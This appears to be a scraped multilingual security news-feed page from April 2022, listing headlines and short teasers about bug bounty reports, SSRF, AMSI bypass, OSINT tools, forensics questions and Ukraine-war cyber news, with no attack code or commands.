    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview
  • Open

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview
  • Open

    A Detailed Guide on AMSI Bypass
    Introduction Windows developed the Antimalware Scan Interface (AMSI) standard that allows a developer to integrate malware defense in his application. AMSI allows an application to The post A Detailed Guide on AMSI Bypass appeared first on Hacking Articles.
    A Detailed Guide on AMSI Bypass
    Introduction Windows developed the Antimalware Scan Interface (AMSI) standard that allows a developer to integrate malware defense in his application. AMSI allows an application to The post A Detailed Guide on AMSI Bypass appeared first on Hacking Articles.
  • Open

    Untitled
    Olá meus amigos, como vocês estão? espero que estejam bem. Continue reading on Medium »
    Euler запускает программу “баунти” ImmuneFi стоимостью $1 млн!
    Программа ImmuneFi Bug Bounty направлена на укрепление безопасности Euler, одновременно развивая сотрудничество с более широкой… Continue reading on Medium »
    Types of Steganography methods that are used for hiding confidential data.
    > Are the images really safe? Continue reading on Medium »
    Spring4Shell
    Spring4Shell and Spring Cloud RCE vulnerability Scanner Continue reading on Medium »
    [1/3] Brute-Force Protection Bypass @ GitLab
    This is the first of three reports describing my findings from a review I did of Gitlab around 6 months ago. I thought I’d start with the… Continue reading on Medium »
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    cilocks-android-lockscreen-bypass
    CiLocks — Android LockScreen Bypass Features Continue reading on Medium »
    pyWhat — Identify Anything. Easily Lets You Identify Emails, IP Addresses, And More…
    The easiest way to identify anything pip3 install pywhat && pywhat --help What is this? Continue reading on Medium »
    Lazyrecon — Tool To Automate Your Reconnaissance Process In An Organized Fashion
    Fashion Continue reading on Medium »
    nexfil-osint-tool-for-finding-profiles-by-username
    NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within… Continue reading on Medium »
  • Open

    War in Ukraine / April 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Identification of the WEX terrorist
    On November 28, 2019, one of the largest waves of virtual mining in Russia began… Continue reading on Medium »
    Analysis of advertising counters on websites
    Today I will talk about the study of unique advertising identifiers on the site and their applicability for use in OSINT research… Continue reading on Medium »
    Useful Chrome browser extensions
    We automate OSINT research using useful extensions for the Chrome browser. The Wayback Machine extension… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-11 Review
    以保护个人隐私为目的的软件程序及供应商列表 by 雨苁 2022年保护数字安全和隐私的300多个技巧清单 by 雨苁 SecWiki周刊(第423期) by ourren CS-Notes by ourren 智能家居平台中的缺陷API利用及其修复 by ourren 利用通信协议反向监控 C&C 服务器 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-11 Review
    以保护个人隐私为目的的软件程序及供应商列表 by 雨苁 2022年保护数字安全和隐私的300多个技巧清单 by 雨苁 SecWiki周刊(第423期) by ourren CS-Notes by ourren 智能家居平台中的缺陷API利用及其修复 by ourren 利用通信协议反向监控 C&C 服务器 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Does anyone here have experience with the EnCase CFSR?
    Doing searches I can find a lot on the ENCE but nothing on the CFSR (beside their official material) despite it being their other major cert. Anyone taken this? How does it compare to the ENCE and other similar certs? submitted by /u/Winter-Obligation276 [link] [comments]
    Windows 7 Vulnerable for MS17-010
    Hi there! ​ I am currently working with a project where I am trying to examine and verify network traffic from "EternalBlue SMB Remote Windows Kernel Pool Corruption" from Metasploit where it is exploiting the MS17-010. The problem is that I can find any Windows 7 that is vulnerable and isnt patched for it yet. Anyone have any tips and ideas? ​ Thanks! submitted by /u/Odylicous [link] [comments]
    Windows Hibernation Files - A Look Back in Time
    Good morning, It’s time for a new 13Cubed episode! I'm sure you've seen hiberfil.sys on Windows systems for years. But, how much do you really know about Windows Hibernation? We'll start with the basics and look at the original concepts behind this technology. We'll then look at how it has changed throughout the evolution of Windows, and discuss the artifact's current forensic value as of today (the "Why should I care?" part). Lastly, we'll take a look at Hibernation Recon, one of the most capable tools available to help us parse these files. Episode: https://www.youtube.com/watch?v=Kbw1sDJb61g Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed submitted by /u/13Cubed [link] [comments]
    AccessData FTK Imager - Memory Capture Failed - Cannot Start Driver
    I am running a Windows 11 VM on Parallels on my MacBook Pro 14" M1 Pro and am trying to perform a memory capture on AccessData FTK Imager 4.7.1.2 and am receiving a "Could Not Start Driver" dialog box and "Memory Capture Failed" in the Memory Progress box. I tried these things below to resolve the problem but got the same outcome: - Ran AccessData FTK Imager as administrator - Disabled driver signature enforcement through Windows admin cmd prompt - Disabled driver signature through boot up troubleshooting prompt - Enabled debug logging on FTK imager but the only thing that shows up is " [FTK Imager.cpp:271]: Imager logging initialized" after the memory capture fails. Nothing else populates the log. ​ I tried this same thing on an old 2013 MacBook Pro i5 running a Windows 10 VM on Parallels and it works, so I am assuming it has to do with the ARM drivers on my machine. submitted by /u/joshmobillybo [link] [comments]
  • Open

    Trends in Web Threats: Attackers Were More Active During Holiday Season
    We analyzed hundreds of thousands of incidents of malicious host URLs in order to identify recent trends in web threats, what they target and how. The post Trends in Web Threats: Attackers Were More Active During Holiday Season appeared first on Unit42.
  • Open

    Process Injection using CreateRemoteThread API
    submitted by /u/tbhaxor [link] [comments]
  • Open

    工信部等五部门印发《关于进一步加强新能源汽车企业安全体系建设的指导意见》
    《意见》共8章22条,第七章“健全网络安全保障体系”着重强化了网络安全方面的防护。
    黑客组织NB65用改进版的Conti勒索软件攻击俄罗斯
    据报道,黑客组织NB65通过对Conti勒索软件泄露的源代码进行改进,从而研发新的勒索软件来攻击俄罗斯。该组织自俄乌战争爆发以来,就与Anonymous黑客组织联手攻击多个俄罗斯目标,包括全俄国家电视广播公司(VGTRK)和俄罗斯航天局Roscosmos。自3月底以来,NB65黑客组织已经通过对泄露的Conti勒索软件源代码进行改进,从而研发新的勒索软件,并逐步使用该勒索软件对俄罗斯实体发起网络攻
    匿名者伙同乌克兰 IT 军团,继续攻击俄罗斯实体
    匿名者黑客组织和乌克兰 IT ARMY将继续对俄罗斯政府实体和私营企业发动网络攻击。
    Facebook 阻止了俄罗斯与白俄罗斯针对乌克兰的网络攻击
    近日,据社交网络巨头Facebook(Meta)透露,与俄罗斯相关的攻击者正试图将社交网络武器化,以打击乌克兰。
    黑客利用Spring4Shell漏洞部署Mirai恶意软件
    有安全人员发现,Spring4Shell漏洞正被攻击者大肆利用,以此执行Mirai恶意软件,部署僵尸网络。2022年4月,Mirai恶意软件开始在新加坡地区大量出现。
    借壳防病毒软件,SharkBot银行木马在Google Play传播
    CPR团队研究人员在Google Play 中发现了几个恶意 Android 应用伪装成防病毒软件,用于传播 SharkBot 银行木马。
  • Open

    The Hacker Playbook 3, ¿sigue siendo relevante?
    Si has leído libros técnicos sobre ciencias de la computación sabrás que estos tienen la desventaja de volverse obsoletos bastante rápido… Continue reading on Medium »
  • Open

    NSFW. folders by year-month. random pics met-art ftv etc.
    submitted by /u/thats_dumberst [link] [comments]

  • Open

    Exploiting BITB with advanced open redirect
    BITB, despite being old, is only being popularly known now, so I will briefly explain what it is, whoever knows, can jump from this to the… Continue reading on Medium »
    There’s $20 up for grabs in this post
    I have been hosting a challenge for my readers with a reward of $20. No one has claimed it yet, the prize is still up for grabs. Continue reading on Medium »
    Running Decentralized, and Community Oriented Bug Bounties
    Bug bounties are not a new thing, but web 3 has challenged security trends, expanding project’s needs, and creating a deep desire for… Continue reading on Medium »
    Exposing Thousands of Indian Railways Outlets’ private data.
    Don’t just use the features, try to exploit them. — Unknown Continue reading on Medium »
    Privacy Disclosure on Facebook Lite after Creating a Post
    Hello, Continue reading on Medium »
    Complete Guide To Start Bug Bounty In 2022
    Hey Everyone ! Today we learn how you can start your bug bounty journey and how you can make a successful bug bounty hunter ! Continue reading on InfoSec Write-ups »
    shonydanza-a-customizable-easy-to-navigate-tool-for-researching-pen-testing-and-defending-with-the-p…
    Continue reading on Medium »
    crawpy-yet-another-content-discovery-tool
    Yet another content discovery tool written in python. Continue reading on Medium »
    4-zero-3–403–401-bypass-methods-bash-automation
    >_ Introduction Continue reading on Medium »
    Wordlistgen — Quickly Generate Context-Specific Wordlists For Content Discovery From Lists Of URLs…
    wordlistgen is a tool to pass a list of URLs and get back a list of relevant words for your wordlists. Wordlists are much more effective… Continue reading on Medium »
  • Open

    How does forcing the user to re-login every couple hours help a web app security?
    At work we have an internal web app. every about 2 hours the app will automatically log you out (even if you were using the app continuously non stop during that period). I asked why so and the answer was : it is a policy forced by higher security authorities in the organization. all computers at work go to sleep in 10 minutes if not used and require entering the password. the question: how does forcing the user to re-login every so often help in web app security? submitted by /u/esamcoding [link] [comments]
    List of protocols that are using TLS & their well known ports?
    I'm looking for (or trying to compile) a list of protocols that are using TLS (implicit, not via STARTTLS), including their well known ports. Like... https: 443 smtps (implicit): 465 imaps: 993 pop3s: 995 ldaps: 636 ftps (implicit): 990 telnet over TLS: 23 and 992 MS Global Catalog SSL 3269 What other protocols belong to this list? Edit: Adding new ports as they are being mentioned. submitted by /u/e_hyde [link] [comments]
    Is it possible to provide incorruptible integrity without authentication?
    Say I want to send a message and prove integrity without worrying about authentication or confidentiality. Is this theoretically possible? From my understanding authentication is sort of a by product of most popular integrity schemes. I'm new to this so sorry if this is a super obvious question. EDIT: Better formulated: "is there a way to send a message over an insecure channel, where integrity is guaranteed but confidentiality or authentication are not". My understanding is no, since you'd have to encrypt the hash which would require a symmetric or asymmetric key exchange which would provide authentication. I understand now that the answer is definitely "no" submitted by /u/jacobjr23 [link] [comments]
    Readings Topic Recommendations Wanted
    Hey guys, I want some advice on a reading list of topics as a junior pentester. I've done a couple of certs, including the OSCP, but I feel that I need to learn the foundational knowledge of things like networks and services, so I can start strong. What topics do you guys feel that every pentester should know outside of a CTF-esque environment? Thanks in advance submitted by /u/lifeover9000 [link] [comments]
    Does anyone else find this meterpreter sessions on his system?
    Hi, when I scan my PC with Antipwny this comes up. Can anyone confirm if their chrome or NordVPN also has open Meterpreter sessions? Also any tips on how to proceed with this? submitted by /u/Sudden-Pin-9480 [link] [comments]
    Phishing URL detection system?
    as my final year project I'm doing phishing URL detection system using deep learning. I started it as a research and to provide a product I'm working on to deploy models using flask(simple web application). because I thought when it comes to phishing attacks URLs have significant role to do. First model was created using NLP(natural language processing) and to train it I used LSTM. second model was created using feature based processing. I read some research papers and extracted simple features which I can work with( ex - if domain include '@' sign that can be a phishing URL. so giving values as '1' for those). NLP based model gave me around 97% accuracy and feature based model gave me around 88% accuracy. but when I try those models with new URLs ( that I didn't take to train the models) it doesn't give me the results as I expect. is there any solution for that. overall I'm asking is my project good enough. what are your ideas to improve it more. any idea that you guys have will be helpful. thank you <3 submitted by /u/lowiqstudent69 [link] [comments]
    Anyone have experience building a Windows AD lab environment in Docker?
    Goal The closest thing I've found to what I'm attempting is this stream. From the description: It is common for people to use spare hardware switches, routers, firewalls, and servers. For years, I used VMware workstation on desktops with multiple SSDs and lots of RAM so I could simulate a dozen VMs. But is there an easier way? Can we simulate hundreds of systems on a desktop. With Docker, I think we can. - cyberlibrarian However, this video was only a rough guide, as far as I can tell the code wasn't published, and only the early networking setup is covered. Context Our org doesn't provide the kind of lab we need so we've been trying to set up an AD testing environment on a hobbyist budget. And that's a low-end (enlisted / E4 pay) "hobbyist budget" not an "I make 6 figures" hobb…
  • Open

    THM: Attacktive Directory
    In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing… Continue reading on InfoSec Write-ups »
    [HTB] Jerry — Walkthrough w/o Metasploit
    Estamos aqui desta vez para falar da Jerry, uma máquina Retirada e de fácil resolução no HTB, porém que pode nos trazer uma compreensão… Continue reading on Medium »
  • Open

    Threat Actor Profile - FIN7
    submitted by /u/RandyMarsh_Lorde [link] [comments]
  • Open

    War in Ukraine / April 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Useful and interesting webinars
    Continue reading on Medium »
    Good News Roundup: a KBJ-inspired Geek edition
    This week we celebrate Judge Ketanji Brown Jackson’s historic confirmation to the Supreme Court, OSINT wins for Ukraine, and more geek… Continue reading on Medium »
    SPY NEWS: 2022 — Week 14
    Summary of the espionage-related news stories for the Week 14 (3–9 April) of 2022. Continue reading on Medium »
    Use Android to hunt down Social Media accounts with SHERLOCK
    About — Sherlock, a powerful command line tool provided by Sherlock Project, can be used to find usernames across many social networks. It… Continue reading on Medium »
    OSINT With Buscador
    OSINT stands for Open Source Intelligence and is the practice of scraping the internet for publicly available information. This… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    [Cullinan #31] Add Six, Update Two 🪴
    컬리넌 로그 #31입니다. 이번에는 변동사항이 좀 많습니다. 신규 항목 6개 추가하였고 Path traversal, SSRF에서 일부 내용을 추가했습니다. 지금 추가하려고 작성중인 항목이나 눈에 보인 항목들이 많아서 아마 당분간은 이것저것 업데이트하게 될 것 같습니다. Add OAST Add Threat Modeling Add Log Injection Add XSHM Add LaTex Injection Add Brute Force Update Path Traversal #RCE with log poisoning Update SSRF #Bypass with AAAA Record 아 참 XSS는… 한번에 정리하기 많아서 좀 더 시간이 필요할 것 같네요 😵‍💫
  • Open

    Help understanding a small evtx file with 8 events.
    Hi community, I'm going through the EVTX ATTACK SAMPLES github repo, and I chose a random one from the Lateral Movement category. I opened the file which includes 8 events, and I can't really understand why this file would be considered suspicious (Link is below). Is this because the calc.exe? or it looks like pass the hash attempts? (logon type 3/key length 0). ​ If there is a resource that maybe explains the EVTX files in the repo - that would be great as a self learning tool but I could not find anything like that. Thanks in advance :) ​ https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Lateral%20Movement/LM_WMI_4624_4688_TargetHost.evtx submitted by /u/HeliosHype [link] [comments]
    Forensically investigating docx files
    I'm looking at a docx sent to me by a rising star colleague in another team. Unlike what they've sent me in other cases, the docx has had its metadata scrubbed in Word (i.e. 0 minutes editing for a 3400 word document). However they've somehow neglected to remove authorship IDs. One of the ids is the colleague, the other is 'admin'. Is there any way easy to determine if the document has an origin outside our org? We do have a pretty good culture here, and I'd really prefer being able to have a diplomatic solution supported by evidence. If I can take some meaningful points for discussion about information sharing to the other team that would probably be ideal but don't want to do this without having something more concrete than suspicions. I've tried looking through it in Python with ZipFile and XML, as well as with docx, but it doesn't give me much more information that I could use. I've used regex to pull all weblinks, and there's nothing beyond internal links and the usual fare of links to MS and standards orgs. About the only thing is that it has some unusual fonts listed that I'd not expect to see in Australia, but are maybe a standard rollout? i.e. a Cherokee and an East Asian font of some sort. If anyone has suggestions that would be great. If not, I might just have to have a slower chat up the chain and stop sharing our strategy documents for now. submitted by /u/horror4802 [link] [comments]
  • Open

    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on System Weakness »
    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on Medium »
  • Open

    IBM's public FTP server with manuals and marketing material and posters etc.
    ftp.www.ibm.com submitted by /u/ShipGiftsToTurkey [link] [comments]

  • Open

    The Journey to get “SQL Injection” at BluePay (BLUE Indonesia BluePay) — 2019
    Hello, In this article i want to share my experience getting SQL Injection on BluePay (BLUE Indonesia BluePay), I found this vulnerability… Continue reading on Medium »
    Android Pentesting Setup On Macbook M1
    Hello hackers, Continue reading on Medium »
    Subdomain Takeover and How the things evolved with Domain Verification
    It is possible that a successful execution of Subdomain Takeover will be critical in exploitation since an attacker will be able to carry… Continue reading on CodeX »
    โปรแกรมตามหา Bug ของ Axelar Network
    ภาพรวมของโปรแกรม Continue reading on Medium »
    Optimized DNS and HTTP Log Tool for pentesters
    eyes.sh 1.0.1 Continue reading on Medium »
    การอัปเดตความปลอดภัย LayerZero — เมษายน 2022
    สัปดาห์ที่ผ่านมาแสดงให้เราเห็นว่าไม่มีอะไรสำคัญไปกว่าความมุ่งมั่นที่จะประเมินและปรับปรุงการรักษาความปลอดภัยอย่างต่อเนื่องในพื้นที่นี้… Continue reading on Medium »
  • Open

    [HTB] Legacy — Walkthrough w/o Metasploit
    Legacy é uma máquina Retirada do HTB. E a primeira publicação desta página é referente a solução dela. Continue reading on Medium »
    Office Multiple Search Order DLL Hijacking
    by: Tamir Yehuda(Tamirye94), Hai Vaknin(vakninhai), Noam Pomerantz, Hoshea Yarden, Ben Amar and Roy Kopit Continue reading on Medium »
  • Open

    Filipino OPM karaoke files?
    Is there a way to download OPM karaoke songs? I tried to search and download the whole magic sing archive but I could not find one. submitted by /u/Sabtreal23 [link] [comments]
  • Open

    Firewall analysis: A portable graph based approach
    submitted by /u/DiabloHorn [link] [comments]
    socialhunter: crawls the website and finds broken social media links that can be hijacked
    submitted by /u/utku1337 [link] [comments]
    Wrote about Azure AD Consent bypass - disclosure
    submitted by /u/jsantasalo [link] [comments]
  • Open

    Tools for Decoding MP3 Steganography
    Any recommended tools for decoding MP3 Steganography that Linux and MacOS are supported? submitted by /u/KnowledgeMammoth1714 [link] [comments]
    Why shouldn't I trust Google Password Manager and Microsoft/Edge Password Manager? Aren't they supposed to be some of the most secure given that they are made by those two giant companies?
    I honestly find these two to have the absolute best seamless syncing and integration across ALL platforms (Android, iOS, MacOS, Linux, Windows). They just work so well and it's painless. They do what they should without any unnecessary bells and whistles: manage passwords. What I love about Google Password Manager is that it lets you encrypt your passwords with a custom passphrase that won't be the same as your Google password. Edge lets you choose a device-specific passphrase that prompts you to enter before auto-filling anything. Controversies and all the discussion about privacy aside, I tend to trust companies like Google and Microsoft in terms of security. Given that they both have to deal with things like HIPAA and FedRAMP as part of their cloud service, I just can't doubt their expertise in having excellent security practices. So why wouldn't I trust a service like Google or Edge for managing my passwords if: (1) I have a 36+ character password on my account, (2) use YubiKey, (3) always enable device-specific extra password for Edge / enable encryption with custom passphrase in Google Password Manager. I am only interested in simply storing my passwords. I NEVER trust any service with my credit card info or bitcoin wallet seedphrase. I already use KeePass on an air-gapped device for storing such data and I never store the database anywhere online. submitted by /u/egobamyasi [link] [comments]
    Automatically onboarding/offboarding employees/contractors
    Not sure if anyone has similar issues. My team has been using quite a few SaaS tools in our daily work. Every time a new employee/contractor comes, I need to manually add them to every software and I will need to remove them when they leave. I feel it is a waste of time to do it manually and it is possible I might miss some. Anyone has come across automation tools or scripts to make it less manual? submitted by /u/Calm_Scene [link] [comments]
  • Open

    Insecure Storage of Sensitive Information on lonestarcell.com server
    MTN Group disclosed a bug submitted by muhnad: https://hackerone.com/reports/1482830
    HTML injection through Invite Teammate email
    SecurityScorecard disclosed a bug submitted by cryptoknight028: https://hackerone.com/reports/1482057
    Folder architecture and Filesizes of private file drop shares can be getten
    Nextcloud disclosed a bug submitted by shakierbellows: https://hackerone.com/reports/1337422 - Bounty: $500
    Found Origin IP's Lead To Access To kraden.com
    Kraden disclosed a bug submitted by 4bhin8v: https://hackerone.com/reports/1531183 - Bounty: $100
    Host Header Injection leads to Open Redirect and Content Spoofing or Text Injection.
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1444675 - Bounty: $300
  • Open

    A Detailed Guide on Responder (LLMNR Poisoning)
    Introduction Responder is a widely used tool in penetration test scenarios and can be used for lateral movement across the network by red teamers. The The post A Detailed Guide on Responder (LLMNR Poisoning) appeared first on Hacking Articles.
    A Detailed Guide on Responder (LLMNR Poisoning)
    Introduction Responder is a widely used tool in penetration test scenarios and can be used for lateral movement across the network by red teamers. The The post A Detailed Guide on Responder (LLMNR Poisoning) appeared first on Hacking Articles.
  • Open

    OSI MODEL
    FULL FORM OF OSI. if you want to know about full form of OSI and knowledge about the of OSI model then you are at right place. OSI full… Continue reading on Medium »
    War in Ukraine / April 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Find users of popular services by time and place…
    The following selection of services is designed to collect data about content (posts, photos, videos) posted at a specific point in time… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Brute Force
    🔍 Introduction Brute Force 공격은 지정된 wordlist 또는 문자 패턴을 기반으로 반복적인 웹 요청을 발생시켜 보안적인 문제를 만들어내는 공격 기법입니다. 이러한 개념은 Fuzzing과 유사하나 Fuzzing은 잘못된 형식을 데이터를 보내 서비스의 결함을 유도한다면, Brute force는 Password에 대한 공격과 같이 허용된 값을 찾기 위해 다수의 데이터를 보내는 방식입니다. 암호학에선 특정한 암호를 풀기 위해 가능한 모든 값을 대입하는 것을 의미합니다. 🗡 Offensive techniques Testing method Brute force는 보통 brute force 또는 fuzzer를 이용하거나 따로 스크립팅하여 테스트합니다.
    Context Technology로 ZAP 스캔 속도 올리기
    ZAP의 Context(Scope)에는 Technology 라는 항목이 존재합니다. 이는 Context > Technology 경로에 존재하며 자세히 살펴보면 DB, Language, OS 등 여러가지 Technology 리스트와 체크박스가 존재합니다. 기본적으로 전부 체크되어 있습니다. 그럼 용도가 무엇일까요? 단순히 서비스에서 사용되는 기술을 작성하는 걸까요? 물론 그건 아닙니다. 이 Technology 항목은 ActiveScan 과 밀접한 영향이 있습니다. 하나 예시로 ActiveScan Rule의 SQL Injection 부분의 코드를 보면 이유를 알 수 있습니다. 코드 내 Tech.MySQL, Tech.MsSQL 같은 인자 값들이 존재하는데, 이게 바로 ActiveScan Rule과 Technology와의 매핑을 위한 값입니다.
    LaTex Injection
    🔍 Introduction LaTex는 TeX 문법을 사용하는 typesetting system 으로 이를 처리하는 시스템에서 TeX 문법을 주입하여 공격자가 원하는 액션을 처리하도록 유도하는 것으로 LaTex Injection이라고 합니다. TeX는 수학의 수식 등 특수한 형태를 띄는 글자를 쉽게 입력하고 사용하기 위한 문법으로 컴퓨터로 문서 작성을 위해 많이 사용되고 있습니다. 자세한 내용은 wikipedia의 TeX 문법 페이지를 보면 대략 어떤 내용인지 이해가 가능합니다. Example 1 \frac{\pi}{2} = \int_{-1}^{1} \sqrt{1-x^2}\ dx 🗡 Offensive techniques Detect 일반적으로 파일 변환 관련 기능에 존재할 가능성이 높습니다.
  • Open

    GCFA examination
    I recently took the SANS FOR500 class and passed my GCFE at 86%. Next up is the FOR508 and GCFA exam. Reaching out to the community to see if anyone has some insight into how the 2 exams compare and if I should expect to put more into the GCFA exam then I had to with the GCFE or if I index and study the same amount as it took me to pass the GCFE at 86%, do you think I’ll be fine with the GCFA? I’ve seen some previous posts here indicating the GCFA is difficult. Thanks ahead of time for any pointers and feedback! Edit: before anyone points it out, I realize the content of the exam will be different, just wanting know if anyone has some experience with how they compare in terms of preparation and time commitment. Also, in case this helps. I’m not required by my job to have these certifications. I’m just fortunate enough to have been given the opportunity to take those courses and certifications and would rather pass them, although it isn’t a requirement. submitted by /u/Ckn0wt [link] [comments]
  • Open

    文件上传之.htaccess的一些技巧
    .htaccess是一个配置文件,用来运行Apache Web Server的Web服务器。
    wireshark抓包,丢包分析?
    如果抓的pcap丢了包,会影响最终安全测试的效果。
  • Open

    New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns
    A new version of SolarMarker malware appears to upgrade evasion abilities and demonstrates that the infostealer and backdoor continues to evolve. The post New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns appeared first on Unit42.

  • Open

    Discord Group for Cybersecurity jobs.
    I made a Discord for people who are looking to build their careers into Cyber Security. https://discord.gg/tMwHKufn submitted by /u/Shazeb02 [link] [comments]
    Which vulnerability in ASUS routers was exploited to install the Cyclops Blink malware?
    So I've read the report by Trend Micro and the analysis by UK NCSC. They explain how it acts and becomes persistent, but nowhere I can read which vulnerability was exploited to actually install the malware in the first place? ASUS says in it's statement: Please note that if you choose not to install this new firmware version then, to avoid any potential unwanted intrusion, we strongly recommend that you disable remote access from WAN and reset your router to its default settings. So one can only guess that there is/was an easy exploitable vulnerability in the remote access function? submitted by /u/ogiakul [link] [comments]
    Print full lines on match in Yara
    How can I have Yara print the full lines for any line found matching a Yara rule. By default it will only print the string found and not the full line the string was found in, and I don't see an option to do that. submitted by /u/ZappaBeefheart [link] [comments]
    Sysmon Tuning Help - Event ID 7 - Image Loaded
    I'm trying to wrap my head around logging for Event ID 7 - Image Loaded events - notoriously a noisy one but obviously a lot of value there. Hoping someone out there has gotten pretty intimate with logging and tuning this particular ID. What approach have you taken towards tuning? There's just a ton of processes in the environment that are always loading .dll's all over the place and I don't have a detailed understanding of the avenues for exploitation here. If I exclude a Image and ImageLoaded combination because it generates a lot of noise, what about that one time an adversary is able to swap in a malicious .dll for the one that is normally legitimat? Or is the idea to catch something loading an image from a location it does not normally load from? One suggesting from the logging cheat sheet is to consider only logging events where the image is unsigned, but you may miss an event where an adversary is able to load something that appears signed but is not. submitted by /u/IHadADreamIWasAMeme [link] [comments]
    20YOE Staff+ Software Engineer at a FAANG. Been interested in netsec since I was a kid. Should I switch? CAN I switch?
    I used to wardial. I used to "creatively" use VMBs to make free international phone calls. I ran a hacker BBS from '94 to '99. I went to my first DefCon before the year 2000. I phreaked. I wrote my first code at four years old on a computer with sixteen kilobytes of RAM and was cracking software when I was eleven (and was dumb enough to put my real name on the title screen...). I used to be an op on #hack and #2600. I've read every volume of TCP/IP Illustrated cover to cover and still remember what each bit does in an IPv4 datagram. I remember when the early issues of Phrack went out and there were so many copies being sent that it would routinely slow down mail delivery across the entire internet. Basically, I love this shit. At the same time, I get an utterly ridiculous amount of money …
    What would be the best certification to get first?
    I wanted to learn coding, so I started at html and css and then I decided that cyber security was really sounding interesting so I started learning python, I am currently taking, Angela yus 100 days of code, course on udemey. I was considering doing a cyber security bootcamp at a college near by, but I heard that boot camps are kinda a waste of money. So I want to be able to get something on my resume to be able to get a job. It seems like certifications are the best way of doing that. I want to know which certification would be best bang for the buck. Which certification would look really good on an application that is also not to complicated for beginners. submitted by /u/bluntsmoker_420 [link] [comments]
    Getting into scripting Zeek vs Python
    I'm trying to get more insight into scripting for networking security purposes. Does anyone have a preference of using zeek vs python? Should I learn python before zeek? Is there anything more beneficial of using one language vs the other? Thanks! submitted by /u/alkior70 [link] [comments]
  • Open

    carpunk-the-car-hacking-toolkit
    CARPUNK IS VERY SIMILAR TO CANghost, ONLY THE DEFFERENCE IS, IT COMES WITH OPTIONS TO ENABLE OR DISABLE INTERFACE AND BASIC SNIFFING AS… Continue reading on Medium »
    Scrummage — The Ultimate OSINT And Threat Hunting Framework
    VERSION 3.6 Continue reading on Medium »
    smersh-a-pentest-oriented-collaborative-tool-used-to-track-the-progress-of-your-companys-missions
    Smersh is a pentest oriented collaborative tool used to track the progress of your company’s missions and generate rapport. Preview front… Continue reading on Medium »
    af-shellhunter-auto-shell-lookup
    AF-ShellHunter: Auto shell lookup Continue reading on Medium »
  • Open

    Exploiting a User-After-Free on PHP to bypass disable_functions
    submitted by /u/gid0rah [link] [comments]
    Microsoft Trusts the Client! Simple Bypass for the Defender for Cloud Apps Proxy
    submitted by /u/BugroSoft [link] [comments]
    Russia’s certificate authority for sanctioned organizations
    submitted by /u/koenrh [link] [comments]
    ImpressCMS: from unauthenticated SQL injection to RCE
    submitted by /u/eg1x [link] [comments]
    Exploiting CVE-2022-0778, a bug in OpenSSL vis-à-vis WebRTC platforms
    submitted by /u/EnableSecurity [link] [comments]
  • Open

    Ukraine — Point de situation au 9 avril
    Les dernières 24h Continue reading on Medium »
    MY EXPERIENCE AS A JUDGE ON TRACELABS CTF SEARCH PARTY 2022
    This was my first year being a judge in the Tracelabs CTF search party competition. To be able to fully judge the submissions that came in… Continue reading on Medium »
    War in Ukraine / April 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Helping the investigative reporter…
    Save is an easy-to-use app designed to help you store, share and enhance your mobile media while protecting your identity. for iOS… Continue reading on Medium »
    My cryptocurrency investigation toolkit…
    Hello! I tried to collect most of the sources in one collection, ranging from blockchain explorers, universal explorers (allowing you to… Continue reading on Medium »
  • Open

    【安全通报】VMware 官方修复多个 Workspace ONE Access 漏...
    近日,VMware 官方发布了关于 Workspace ONE Access (前称 VMware Identity Manager)的多个漏洞补丁,其中曝光了一个服务器模板注入导致的远程命令执行漏洞(C...
  • Open

    【安全通报】VMware 官方修复多个 Workspace ONE Access 漏...
    近日,VMware 官方发布了关于 Workspace ONE Access (前称 VMware Identity Manager)的多个漏洞补丁,其中曝光了一个服务器模板注入导致的远程命令执行漏洞(C...
  • Open

    Permissions-Policy 헤더로 조금 더 안전하게 Browser API 사용하기
